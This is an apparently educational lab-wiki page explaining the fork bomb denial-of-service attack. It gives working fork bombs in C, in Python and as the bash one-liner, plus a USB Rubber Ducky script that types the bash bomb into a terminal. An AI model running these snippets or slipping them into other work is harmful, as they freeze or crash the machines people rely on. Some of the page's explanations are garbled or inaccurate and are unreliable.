Fork bomb

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search

The Fork Bomb (also called rabbit virus or wabbit) is a memory exhausting Denial of Service (DoS) Attack. It depletes the memory of a machine by replicating itself exponentially until all memory is used up.

Implementation

The fork bomb utilizes the fork system call which is implemented in every programming language. The Fork command calls a child process of that executes the next line of code with it simultaneously. The mother node patiently awaits the completion of its child processes, but the child processes will never exceed their completion because they also waiting for their child processes. 

1| fork()                  L1
                          /  \
2| fork()               L2    L2
                       / \    / \
3| fork ()            L3  L3 L3  L3

As the code shows the processes double every line so the number of running processes increase relative to .

The following section shows some fork bomb example written in different languages.

C

#include <unistd.h> 
int main(void) 
{  
  for(;;)  
     fork(); 
  return 0; 
}

Python

import os
   
while True:  
   os.fork()

Command line variant: 

python -c 'while 1: __import__("os").fork()'

Unix Bash

:(){ :|:& };:

This command line command can be deciphered like this 

:()       # Defines the following function ":" 
{
   :       # Loads a copy of the function ":"
   |       # Redirects the Output that it is not seen in the shell
   :       # Loads a copy of the function ":"
   &       # Runs the programs as a background process
}
:         # Runs the beforehand defined function ":"

This command is dangerous because the user issuing it does need any grants.

Forkbomb used by USB Rubber Ducky

Rezky Aulia Efendy et. al. in [4] used a USB Rubber Ducky to perform the fork bomb on a windows 8 personal computer. The USB Rubber Ducky is a self-typing Keyboard disguised as an USB flash drive. Their implementation opened multiple instances of Microsoft Paint to perform the memory depletion attack.

This attack can also be Performed on Unix based Operating systems by using the bash fork bomb 

 :(){ :|:& };:

The Rubber ducky script would look like as follows: 

CTRL-ALT t
DELAY 200
STRING  :(){ :|:& };:
ENTER

References

[1] https://de.wikipedia.org/wiki/Forkbomb (german version for source code)

[2] https://en.wikipedia.org/wiki/Forkbomb

[3] https://www.geeksforgeeks.org/fork-system-call/

[4] IEEE: Exploring the Possibility of USB based Fork Bomb Attack on Windows Environment

Retrieved from "https://wiki.elvis.science/index.php?title=Fork_bomb&oldid=3760"